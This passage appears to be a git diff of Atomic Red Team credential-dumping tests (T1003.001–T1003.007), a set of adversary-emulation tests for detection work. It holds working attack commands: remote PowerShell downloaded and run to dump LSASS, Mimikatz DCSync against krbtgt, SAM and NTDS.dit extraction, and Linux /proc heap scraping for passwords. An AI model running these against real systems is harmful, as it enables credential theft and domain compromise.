 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
 if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
  Expand-Archive $zippath $parentpath\wce -Force
@@ -124,10 +129,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
 **Supported Platforms:** Windows


+**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
 | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
@@ -151,10 +160,11 @@ del "#{output_file}" >nul 2> nul
 ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
 Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
 New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -175,6 +185,10 @@ Upon successful execution, you should see the following file created $env:TEMP\l
 **Supported Platforms:** Windows


+**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
+
+
+



@@ -208,10 +222,14 @@ If you see a message saying \"The system cannot find the path specified.\", try
 **Supported Platforms:** Windows


+**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;Outflank-Dumpert.exe|

@@ -234,10 +252,11 @@ del C:\windows\temp\dumpert.dmp >nul 2> nul
 ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
 Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
 ```
@@ -255,6 +274,10 @@ Manager and administrative permissions.
 **Supported Platforms:** Windows


+**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
+
+
+


 #### Run it with these steps! 
@@ -285,10 +308,14 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
 **Supported Platforms:** Windows


+**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the Lsass dump | Path | %tmp%&#92;lsass.DMP|
 | mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;mimikatz.exe|
@@ -308,10 +335,11 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
 ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
 $request = [System.Net.WebRequest]::Create($url)
 $response = $request.GetResponse()
@@ -328,7 +356,7 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
 ##### Description: Lsass dump must exist at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-cmd /c "if not exist #{input_file} (exit /b 1)" 
+cmd /c "if not exist #{input_file} (exit /b 1)"
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -351,6 +379,10 @@ Successful execution of this test will display multiple useranames and passwords
 **Supported Platforms:** Windows


+**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
+
+
+



@@ -369,7 +401,7 @@ pypykatz live lsa
 ##### Check Prereq Commands:
 ```cmd
 py -3 --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -379,7 +411,7 @@ echo "Python 3 must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -389,7 +421,7 @@ echo "PIP must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 pypykatz -h >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -410,6 +442,10 @@ Upon successful execution, you should see the following file created $env:SYSTEM
 **Supported Platforms:** Windows


+**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
+
+
+



@@ -417,6 +453,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM


 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
 ```

@@ -443,10 +480,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
 **Supported Platforms:** Windows


+**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
 | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
@@ -470,7 +511,7 @@ del "#{output_file}" >nul 2> nul
 ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -495,10 +536,14 @@ Or, if you try to run the test without the required administrative privleges you
 **Supported Platforms:** Windows


+**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|

@@ -525,10 +570,14 @@ This test uses the technique describe in this tweet
 **Supported Platforms:** Windows


+**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;dotnet-lsass.dmp|
 | createdump_exe | Path of createdump.exe executable | Path | C:&#92;Program Files&#92;dotnet&#92;shared&#92;Microsoft.NETCore.App&#92;5.*.*&#92;createdump.exe|
@@ -556,7 +605,7 @@ del #{output_file}
 ##### Description: Computer must have createdump.exe from .Net 5
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1} 
+if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -579,10 +628,14 @@ Upon successful execution, you should see the following file created $env:TEMP\l
 **Supported Platforms:** Windows


+**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
 | output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
@@ -606,10 +659,11 @@ Remove-Item ${output_file} -ErrorAction Ignore
 ##### Description: Computer must have xordump.exe
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} 
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
 ```

@@ -38,6 +38,7 @@ atomic_tests:
      if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
    get_prereq_command: |
      $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
      if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
        Expand-Archive $zippath $parentpath\wce -Force
@@ -78,6 +79,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
      Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
      New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -129,6 +131,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
      Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
  executor:
@@ -183,6 +186,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
      $request = [System.Net.WebRequest]::Create($url)
      $response = $request.GetResponse()
@@ -256,6 +260,7 @@ atomic_tests:
  - windows
  executor:
    command: |
+       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
    cleanup_command: |
      Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
@@ -382,6 +387,7 @@ atomic_tests:
    prereq_command: |
      if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
  executor:
    command: |
@@ -44,6 +44,10 @@ Upon successful execution of this test, you will find three files named, sam, sy
 **Supported Platforms:** Windows


+**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
+
+
+



@@ -76,6 +80,10 @@ Parses registry hives to obtain stored credentials
 **Supported Platforms:** Windows


+**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
+
+
+



@@ -94,7 +102,7 @@ pypykatz live registry
 ##### Check Prereq Commands:
 ```cmd
 py -3 --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -104,7 +112,7 @@ echo "Python 3 must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -114,7 +122,7 @@ echo "PIP must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 pypykatz -h >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -134,10 +142,14 @@ This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
 **Supported Platforms:** Windows


+**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
 | file_name | Name of the copied file | String | SAM|
@@ -169,6 +181,10 @@ Executes a hashdump by reading the hasshes from the registry.
 **Supported Platforms:** Windows


+**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
+
+
+



@@ -37,10 +37,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows


+**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|

@@ -59,7 +63,7 @@ vssadmin.exe create shadow /for=#{drive_letter}
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -84,10 +88,14 @@ This test must be executed on a Windows Domain Controller.
 **Supported Platforms:** Windows


+**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vsc_name | Name of Volume Shadow Copy | String | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
 | extract_path | Path for extracted NTDS.dit | Path | C:&#92;Windows&#92;Temp|
@@ -115,7 +123,7 @@ del "#{extract_path}\SYSTEM_HIVE"     >nul 2> nul
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -124,7 +132,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
 ##### Description: Volume shadow copy must exist
 ##### Check Prereq Commands:
 ```cmd
-if not exist #{vsc_name} (exit /b 1) 
+if not exist #{vsc_name} (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -133,7 +141,7 @@ echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with
 ##### Description: Extract path must exist
 ##### Check Prereq Commands:
 ```cmd
-if not exist #{extract_path} (exit /b 1) 
+if not exist #{extract_path} (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -158,10 +166,14 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
 **Supported Platforms:** Windows


+**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_folder | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|

@@ -185,7 +197,7 @@ rmdir /q /s #{output_folder} >nul 2>&1
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -206,10 +218,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows


+**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|

@@ -228,7 +244,7 @@ wmic shadowcopy call create Volume=#{drive_letter}
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -249,10 +265,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows


+**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|

@@ -280,10 +300,14 @@ The Active Directory database NTDS.dit may be dumped by creating a symlink to Vo
 **Supported Platforms:** Windows


+**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 | symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
@@ -20,10 +20,14 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
 **Supported Platforms:** Windows


+**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder&#92;T1003.004&#92;bin&#92;PsExec.exe|

@@ -46,7 +50,7 @@ del %temp%\secrets >nul 2> nul
 ##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{psexec_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -8,13 +8,13 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt

 ## Atomic Tests

- [Atomic Test #1 - DCSync](#atomic-test-1---dcsync)
+- [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)


 <br/>

-## Atomic Test #1 - DCSync
-Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
+## Atomic Test #1 - DCSync (Active Directory)
+Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
 Works against a remote Windows Domain Controller using the replication protocol.
 Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
 [Reference](https://adsecurity.org/?p=1729)
@@ -22,12 +22,16 @@ Privileges required: domain admin or domain controller account (by default), or
 **Supported Platforms:** Windows


+**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| domain | Targeted domain | string | example.com|
+| domain | Targeted Active Directory domain | string | example.com|
 | user | Targeted user | string | krbtgt|
 | mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|

@@ -47,7 +51,7 @@ Privileges required: domain admin or domain controller account (by default), or
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -1,10 +1,10 @@
 attack_technique: T1003.006
 display_name: "OS Credential Dumping: DCSync"
 atomic_tests:
- name: DCSync
+- name: DCSync (Active Directory)
  auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
  description: |
-    Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
+    Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
    Works against a remote Windows Domain Controller using the replication protocol.
    Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
    [Reference](https://adsecurity.org/?p=1729)
@@ -12,7 +12,7 @@ atomic_tests:
    - windows
  input_arguments:
    domain:
-      description: Targeted domain
+      description: Targeted Active Directory domain
      type: string
      default: example.com
    user:
@@ -0,0 +1,142 @@
+# T1003.007 - Proc Filesystem
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
+<blockquote>Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
+
+This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
+
+- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
+
+
+<br/>
+
+## Atomic Test #1 - Dump individual process memory with sh (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+copy process memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path}
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Dump individual process memory with Python (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+PYTHON=$(which python || which python3 || which python2)
+$PYTHON #{python_script} $PID #{output_file}
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path}
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+##### Description: Requires Python
+##### Check Prereq Commands:
+```sh
+(which python || which python3 || which python2)
+```
+##### Get Prereq Commands:
+```sh
+echo "Python 2.7+ or 3.4+ must be installed"
+```
+
+
+
+
+<br/>
@@ -0,0 +1,106 @@
+---
+attack_technique: T1003.007
+display_name: 'OS Credential Dumping: Proc Filesystem'
+atomic_tests:
+- name: Dump individual process memory with sh (Local)
+  auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+  description: |
+    Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+    copy process memory to an external file so it can be searched or exfiltrated later.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007.bin
+    script_path:
+      description: Path to script generating the target process
+      type: Path
+      default: /tmp/T1003.007.sh
+    pid_term:
+      description: Unique string to use to identify target process
+      type: String
+      default: T1003.007
+
+  dependencies:
+    - description: |
+        Script to launch target process must exist
+      prereq_command: |
+        test -f #{script_path}
+        grep "#{pid_term}" #{script_path}
+      get_prereq_command: |
+        echo '#!/bin/sh' > #{script_path}
+        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sh #{script_path}
+      PID=$(pgrep -n -f "#{pid_term}")
+      HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+      MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+      MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+      MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+      dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+      grep -i "PASS" "#{output_file}"
+    cleanup_command: |
+      rm -f "#{output_file}"
+
+- name: Dump individual process memory with Python (Local)
+  auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+  description: |
+    Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+    copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007.bin
+    script_path:
+      description: Path to script generating the target process
+      type: Path
+      default: /tmp/T1003.007.sh
+    python_script:
+      description: Path to script generating the target process
+      type: Path
+      default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+    pid_term:
+      description: Unique string to use to identify target process
+      type: String
+      default: T1003.007
+
+  dependencies:
+    - description: |
+        Script to launch target process must exist
+      prereq_command: |
+        test -f #{script_path}
+        grep "#{pid_term}" #{script_path}
+      get_prereq_command: |
+        echo '#!/bin/sh' > #{script_path}
+        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+    - description: |
+        Requires Python
+      prereq_command: |
+        (which python || which python3 || which python2)
+      get_prereq_command: |
+        echo "Python 2.7+ or 3.4+ must be installed"
+
+  executor:
